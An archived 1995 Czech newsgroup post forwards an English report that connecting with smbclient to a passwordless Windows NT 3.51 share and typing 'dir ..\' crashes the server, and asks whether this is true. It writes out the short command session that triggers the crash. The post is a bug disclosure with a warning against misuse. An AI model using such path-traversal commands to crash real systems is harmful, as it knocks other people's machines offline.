Go to listserv.cesnet.cz LWGate Home Page.From: Petr Snajdr <snajdr@IRIS.VSZBR.CZ>
Subject: How to crash WNT with smbclient
Date: Mon, 18 Dec 1995 15:47:32 GMT
Next Article (by Date): Re: How to crash WNT with smbclient Jiri Kvarda
Previous Article (by Date): Re: Internet zdarma? Pavel Krbec
Next in Thread: Re: How to crash WNT with smbclient Jiri Kvarda
Articles sorted by: [Date] [Subject]
X-URL: news:cz.net.csinfo
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Dobry den,
hledal jsem nejake informace pro novell-like server nad Linuxem a nasel tohle.
Co je na tom pravdy ?
While looking for the WFWG Lan Manager security bug (the one which
allows any user to cd ..\ on an exported volume to access files not
exported),
I found that you can crash WNT (3.51 build 1057, at least) very easily.
I did this using smbclient (Samba is an excellent freeware Lan Manager
server for any Unix, see http://lake.canberra.edu.au/pub/samba/) on a Unix
machine, but it obviously is not a client problem contrary to what Microsoft
tried to make us believe for the WFWG bug.
The funny thing is that you can crash any WNT machine on the Internet
if they have publicly-exported (i.e., no password) volumes... DON'T DO IT !
$ smbclient '\\pcnt\nttest'
Server time is Fri Dec 15 13:47:26 1995
Timezone is UTC+1.0
Password:
smb: \> dir ..\
The "dir ..\" above crashes the machine. Other commands ("rm ..\" for
example)
have the same effect).
Is this a known bug ?
Sounds like WNT still has a long way to go before it is as robust as
Microsoft
likes us to believe...
--
Pierre Beyssac pb@fasterix.frmug.fr.net pb@fasterix.freenix.fr
{Free,Net,Open}BSD, Linux : il y a moins bien, mais c'est plus cher
s pozdravem Petr Snajdr
Next Article (by Date): Re: How to crash WNT with smbclient Jiri Kvarda
Previous Article (by Date): Re: Internet zdarma? Pavel Krbec
Next in Thread: Re: How to crash WNT with smbclient Jiri Kvarda
Articles sorted by: [Date] [Subject]